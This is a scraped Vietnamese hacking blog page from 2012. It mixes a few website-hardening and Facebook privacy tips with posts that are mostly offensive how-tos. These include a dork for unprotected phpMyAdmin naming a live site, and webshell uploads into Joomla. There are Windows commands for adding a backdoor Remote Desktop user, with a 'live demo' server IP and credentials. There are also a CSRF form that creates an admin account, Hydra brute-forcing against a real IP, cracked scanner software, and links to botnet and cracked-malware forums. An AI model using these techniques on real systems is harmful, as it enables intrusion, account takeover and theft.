Mình xin giới thiệu một link để các bạn mã hoá base64 file php: http://dnstools.it-4vn.com/phpencode.php

8. Ngăn download source code khi server gặp sự cố:

Tạo file .htaccess nội dung như sau:
<Files "config.php">
Order Allow,Deny
Deny from All
</Files>
<Files "class_core.php">
Order Allow,Deny
Deny from All
</Files>
Mục đích để ngăn cản việc download source code khi PHP bị overload hoặc terminated. Nguyên nhân có thể đến từ bên trong hoặc bên ngoài. Tôi không đề cập ở đây.

9. Vô hiệu hoá biên dịch mã PHP trong thư mục chỉ định

Nếu bạn có một thư mục dành cho việc upload, bạn nên vô hiệu hoá việc biên dịch và thực thi mã PHP trong thư mục ấy vì attacker có thể lợi dụng việc upload để đưa script độc (webshell) lên host của bạn.

Tạo file .htaccess đặt vào thư mục đó với nội dung như sau:
php_admin_flag engine off
Sau đó chmod 444 cho file.
Các bạn có thể thảo luận hoặc tham khảo thêm tại đây: http://www.enhack.net/xforce/showthread.php?t=22

10. Thường xuyên cập nhật vá lỗi cho website và đặt một mật khẩu quản trị tương đối kiên cố, liên hệ với nhà cung cấp dịch vụ để sửa lỗi.

Lưu ý cuối cùng:

File php.ini mình đề cập ở trên chỉ có tác dụng tại thư mục chứa nó, các thư mục không chứa nó sẽ không bị nó chi phối mà sẽ bị cấu hình trong php.ini của server chi phối.
Các file php.ini và .htaccess nên chmod 444 để bảo vệ cấu hình.
Chúc các bạn thành công.
Jutoms
nguồn : enhack.net

10 lưu ý bảo mật dữ liệu cho website

By: MIN Software on: 8:34 PM

Thursday, April 12, 2012

Lỗ hổng bảo mật: Cross Site Scripting (XSS).

PoC: http://mp3.zing.vn/playlist/Checked-by-Juno-okyo.../IWAEBWI8.html

Đã khắc phục!

[Checked] - Mp3.zing.vn - Part 2

By: MIN Software on: 7:42 AM
Cross Site Scripting
Link: /tim-kiem/bai-hat.html

 

[Checked] - Mp3.zing.vn

By: MIN Software on: 3:17 AM

Tuesday, April 10, 2012

Thường xuyên sử dụng Facebook để cập nhật và chia sẻ thông tin với bạn bè, nhưng bạn có quan tâm đến việc bảo mật thông tin cá nhân của mình? Top 5 cách thiết lập sau sẽ giúp bạn “cài then” vững chắc cho tài khoản Facebook của mình, tránh để các thông tin cá nhân bị lộ ra ngoài.
Nhiều người khi sử dụng Facebook thường ít quan tâm đến vấn đề bảo mật và khá phóng khoáng trong việc chia sẻ thông tin, hình ảnh hay truy cập ứng dụng bừa bãi. Khi được cấp phép, một số ứng dụng có thể lấy cắp thông tin cá nhân của bạn để phục vụ cho mục đích khác. Điển hình là ứng dụng Girls Around Me giúp bạn “tìm gái” trong phạm vi gần nhất. Ứng dụng đã lấy cắp thông tin địa điểm từ Foursquare và hình ảnh từ Facebook để hiển thị những phụ nữ đang ở gần bạn. Dù Girls Around Me đã bị buộc ngừng hoạt động song đó cũng là “lời cảnh tỉnh” cho những người thường chia sẻ thông tin trên Facebook.
Năm lời khuyên sau của nhà phân tích bảo mật Sarah Downey sẽ giúp bạn an toàn hơn. Mọi thiết lập để bảo vệ thông tin cá nhân đều nằm tại trang Privacy Settings (http://www.facebook.com/settings/?tab=privacy).
1. Chỉ chia sẻ thông tin cho bạn bè
Downey khuyến nghị người dùng chỉ nên chia sẻ thông tin cho bạn bè ở chế độ “friends only”. Downey cho biết “Nếu chia sẻ ở chế độ ‘friends of friends’, thông tin của bạn sẽ phơi bày trước trung bình 150.000 người khác. Các dữ liệu này lộ ra ngoài sẽ lọt vào các ứng dụng đáng sợ, mà điển hình là Girls Around Me và Spokeo.com”.
Để đổi chế độ chia sẻ sang “friends only”, bạn vào trang Privacy Settings, chọn chế độ Friends hay Custom.
Khi chọn Custom, bạn nhớ bỏ chọn tại mục Friends of those tagged. Nếu đánh dấu vào mục này nghĩa là bạn cho phép những người được tag trong tin được chia sẻ tin đến bạn bè của họ.
2. Đừng để bạn bè chia sẻ thông tin của bạn
Bạn nên cẩn thận với ứng dụng dạng như BranchOut. Được giới thiệu sẽ giúp xây dựng mạng lưới nghề nghiệp trên Facebook, BranchOut sẽ truy cập vào các thông tin về nghề nghiệp, học vấn, nơi ở của bạn. Và không cần bạn cho phép, ứng dụng cũng sẽ xem được các thông tin từ những người bạn của bạn.
Do vậy, nếu bạn bè của bạn có sử dụng các ứng dụng tựa như BranchOut thì thông tin của bạn cũng không an toàn. Ngoài việc hạn chế kết bạn với những người không quen biết, thiết lập sau sẽ giúp tài khoản của bạn không bị các ứng dụng xâm nhập trái phép. Tại trang Privacy Settings, bạn nhấn Edit Settings tại mục Apps and Websites. Kế đến, bạn nhấn Edit Settings tại trường How people bring your info to apps they use rồi bỏ chọn tại tất cả các ô. Xong, bạn nhấn Save Changes để lưu lại.
3. Cẩn thận với tính năng Tag
Các mạng xã hội như Facebook và Google+ đều có tính năng nhận diện khuôn mặt để tag những người có liên quan vào ảnh. Không như Google+ cho phép người dùng tự chọn bật tắt tính năng nhận diện khuôn mặt, Facebook sẽ tự động nhận diện sau khi bạn upload ảnh lên và gợi ý cho người dùng. Tính năng “tag suggestions” trên Facebook sẽ đưa ra gợi ý về các khuôn mặt trong ảnh. Nếu một người upload ảnh có khuôn mặt bạn trong đó, họ sẽ nhận được gợi ý tag bạn vào ảnh. Để không bị tag vào ảnh của những người xa lạ, bạn nhấn Edit Settings tại Timeline and Tagging, nhấn Who sees tag suggestions when photos that look like you are uploaded và chọn No One.
Hoặc bạn có thể bật tính năng Tag Review để kiểm duyệt trước khi được tag vào hình ảnh hay bài viết. Chỉ khi được cho phép, bạn mới được tag vào bài hay ảnh của người khác.
4. Chọn lại chế độ chia sẻ cho các bài đăng cũ
Khi chuyển sang Timeline, một số bài đăng cũ của bạn có thể sẽ hiện diện trước mọi người. Để thiết lập lại chỉ cho bạn bè xem, bạn nhấn Manage Past Post Visibility tại Limit the Audience for Past Posts, chọn Limit Old Posts. Sau đó, toàn bộ bài đăng cũ được chia sẻ ở chế độ “public” hay “friends of friends” đều được chỉnh lại thành “friends”.
5. Tắt tính năng Subscribe
Tính năng Subscribe cho phép mọi người không phải bạn bè có thể theo dõi tin trên trang cá nhân của bạn. Nếu không muốn mọi thông tin đăng lên đều được chia sẻ với các “subcriber” xa lạ, bạn nên tắt tính năng này đi.
Nếu đã lỡ bật tính năng Subscribe, bạn vào Account Settings, chọn thẻ Subscribers (hay truy cập trực tiếp vào đây). Bạn bỏ chọn tại dòng Allow Subscribers để tắt tính năng Subscribe đi.
Downey cho biết “Nếu bạn không tắt Subscribe, mọi thông tin mà bạn chia sẻ ở chế độ “public” sẽ hiện diện trên các bộ máy tìm kiếm và sẽ được tìm thấy rất dễ dàng”.
Tham khảo: ReadWriteWeb

5 mẹo bảo mật thông tin cá nhân trên Facebook bạn nên biết

By: MIN Software on: 6:41 AM

Sunday, April 1, 2012

Dork:
intitle : phpmyadmin inurl:server_processlist.php
Demo:
http://houseofblinds.com/myhob/index.php

Find Phpmyadmin without login and hack website

By: MIN Software on: 8:53 AM
http://www.mediafire.com/?i85omji4kil304c 
Tool: Acunetix Web Vulnerability Scanner
Đổi đuôi file từ jpg > aspx

Up shell FPT : Đổi đuôi file

By: MIN Software on: 8:50 AM
[Các bước thực hiện]
{1} Trước tiên các bạn cần phải có 1 con Shell trên server có khả năng sử dụng command line (Ở đây các bạn có thể khai thác các lỗ hổng của website để up shell).
{2} Cần phải có full quyền Administrator/Root cho user. Nếu tài khoản user trên server đang sử dụng không có full quyền thì bạn có thể dùng exploit shellcode để khai thác nâng quyền.
{3} Sau khi có shell trên server, các bạn có thể cài backdoor hoặc sử dụng ngay chức năng run CMD trên shell của bạn.
{4} Tạo 1 user mới trên server bằng lệnh. Trong đó lht192 là User và 123456 là mật khẩu:

net user lht192 123456 /ADD
{5} Set quyền remote desktop cho user lht192 bằng lệnh:
net localgroup "Remote Desktop Users" lht192 /ADD
{6} Nếu thành công thì bạn sẽ nhận được kết quả trả về như sau:
The command completed successfully.
{7} Sử dụng chức năng Remote Desktop của Windows để kết nối và điều khiển server !

Live Demo [14/07/2011]:
Server IP: 210.245.81.159
Username: lht192
Password: lht192

Chiếm quyền Dedicated Windows Server (VPS)

By: MIN Software on: 8:49 AM

[SQL] Maximark.com.vn

By: MIN Software on: 8:47 AM
Cách 1 :
_Load /administrator > Global Configuration > Systerm > Media Setting > thêm định dạng .php
_Sau đó vào Media Manager up shell.php
_Chạy shell: http://victim/images/shell.php
Cách 2 :
Edit temp Jomla : Chúng ta vào phần template > edit cái index.php template
Sau đó chạy : http://victim.com/index.php

Upload Shell Joomla

By: MIN Software on: 8:46 AM

Remote Desktop VIA Real VNC

By: MIN Software on: 8:45 AM
Linux:

Windown

SQl 10 Phút

By: MIN Software on: 8:42 AM

Xem file config = SQL injection

By: MIN Software on: 8:39 AM
Bài 1:

Sử dụng 2 tool Metasploit Framework và Intelli Admin trên nền Windows, để tìm và khai thác lỗi chạy shell, add user , nâng quyền user và remote desktop từ máy client đến máy server.
Tut:

Local Lan .ppt
framework-3.2
setupex
Kết bài là hướng khắc phục :
+ Cấu hình địa chỉ ip.
+ Thường xuyên update bản vá lỗi trên nền server sử dụng.
+ ...

Kỹ thuật sử dụng shell/remote local Lan

By: MIN Software on: 8:37 AM

allinurl:dynamicimg.php

Lưu code dưới dạng abc.html ,code này vượt qua kiểm tra đăng nhập /admin sẽ tạo 1 user với quyền administrator
username=password=admin
<html>
<title>add adnub</title>

<body link="#00FF00" text="#008000" bgcolor="#000000">

<form method="POST"
action="http://abc.com/admin/options/users.php">
<input type="hidden" name="type" value="add">
<table border="1" cellpadding="4" style="border-collapse: collapse"
width="100%" bordercolor="#808080">
<tr>
<td>
<p align="center"><b>User & Pass : admin</b></p>
<font color="#00FF00">Add new</font></a></font></b></p>
<p align="center"><b>Username:</b></td>
</tr>
<tr>
<td height="1">
<p align="center"><input
type="text" name="adminuser" size="30" value="admin"></td>
</tr>
<tr>
<td>
<p align="center"><b>Password:</b></td>
</tr>
<tr>

<td height="22">
<p align="center">
<input type="password" name="adminpass" size="30" value="admin"></td>
</tr>
<tr>
<td align="right">
<p align="center">
<input type="submit" value="Add User >>" style="font-weight:
700"></td>
</tr>
</form>
</table></html>

Bug của Status2k

By: MIN Software on: 8:35 AM

  http://www.mediafire.com/?6ki0mb1cvab0c5k

Thường thì dùng shell để đoán pass loạn tử cung
Bây h cũng đoán pass,nhưng = hydra
Download -> giải nén vào ổ C:\ -> thư mục C:\hydra
Windown + R -> cmd
cd C:\hydra
hydra -L abc.txt -P pass.txt -e ns 112.78.2.4 ftp
edit thư mục abc.txt -> các user trên sv
112.78.2.4 : ip sv
Nếu sv chặn việc brute thì hiện
Too many connections
Còn ko thì sẽ nhận đc user+pass ftp

Hydra - Đoán pass thần chưởng

By: MIN Software on: 8:34 AM

Remote desktop LAN

By: MIN Software on: 8:31 AM

Video hack shop cho newbie

By: MIN Software on: 8:30 AM
Vulnerability Scanner 8
crack :
Xong thì mở Acunetix lên :| Nó kêu active thì cứ điền thí vào next, next là xong.

Web Vulnerability Scanner 8

By: MIN Software on: 8:22 AM
http://hvaonline.net
http://1337day.com/author/2901
http://www.exploit-db.com/
http://th3-0utl4ws.com/
http://www.leetupload.com
http://hvh.vn
http://vnhacker.blogspot.com/
http://rootbiez.blogspot.com/
http://eidelweiss-advisories.blogspot.com
http://www.tamhon.net/
http://blog.enhack.net
http://tuonglua.net
http://cya0vn.blogspot.com
http://vinakid.blogspot.com/
http://dz4all.com/
http://www.governmentsecurity.org
http://www.blog.kai.vn
http://uitns.net/forum/
http://diendanmaychu.vn/f
http://www.kmasecurity.net/xforce/
http://ha.ckers.org

http://www.nhatnghe.com
http://ceh.vn
http://athena.edu.vn
http://vnpro.org/forum/
http://www.huongdanlaptrinh.com
http://thantoc.net/

http://www.viprasys.org >> yahoo
http://www.botsvsbrowsers.com/SimulateUserAgent.asp
http://vctools.net/forum/
http://www.turkhackteam.net/
http://rstcenter.com/forum/
http://translate.googleusercontent.c...dZg35VG92gA-SA
http://www.iexploit.org
http://www.r00tw0rm.com/forum
http://hashchecker.de/ >crack pass
http://board.th3-0utl4ws.com
http://www.thehackernews.com/
http://www.hackthissite.org
http://translate.google.com.vn/trans...ec4ever.com%2F
http://vbspiders.com/tools/locals/
http://h4ckcity.org/forums/
http://ethical-hacking-tutor.blogspot.com
http://www.toiphammaytinh.com
http://forum.itsecteam.com/
http://packetstormsecurity.org/
http://hocphponline.com/blog/
http://www.alboraaq.com/forum/
http://irist.ir/forum/index.php
http://www.sellug.com
http://alikaptanoglu.blogspot.com
http://www.hackhound.org
http://www.beenuarora.com/
http://www.securitytube.net/
http://satthuo.blogspot.com/
http://www.secunet.to/
http://www.vulnerability-lab.com/

http://hack4sec.org/
http://www.turkblackhats.com/tb/index.php
http://s-war.com/vb/forum.php
http://hackerzone.vn/vnhz/index.php
http://www.opensc.ws/cracked-malware/
http://www.securitytube.net/listing?type=latest

boot alexa :http://alexa.lr2b.com
http://studyandshare.wordpress.com/ : java
http://www.htaccessredirect.net/index.php : tao htaccess

http://blackburnhacker.blogspot.com/...ia-botnet.html :botnet
http://www.ubers.org/Forum-IRC-Bots-Botnets-DDOS

Crack Md5
http://www.md5-db.com/index.php
http://plain-text.info/add/
http://www.tmto.org/
https://hashcracking.ru/
http://hashcrack.com/
http://www.cryptohaze.com/addhashes.php
http://md5.rednoize.com/
http://isc.sans.org/tools/reversehash.html
http://www.c0llision.net/webcrack.php
http://www.md5decrypter.co.uk/
more....

Crack SHA1 hash
http://passcrack.spb.ru/
http://www.hashreverse.com/
http://rainbowcrack.com/
http://www.md5encryption.com/
http://www.shalookup.com/
http://md5.rednoize.com/
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.tmto.org/
http://linardy.com/md5.php
http://www.gdataonline.com/seekhash.php
https://www.w4ck1ng.com/cracker/
http://search.cpan.org/~blwood/digest-md5-reverse-1.3/
http://www.hashchecker.com/index.php?_sls=search_hash

PHP
http://tinhoc365.net/

1 số website nghiên cứu

By: MIN Software on: 6:45 AM

 

Our Team Members

Copyright © hacker va bao mat | Designed by Templateism.com | WPResearcher.com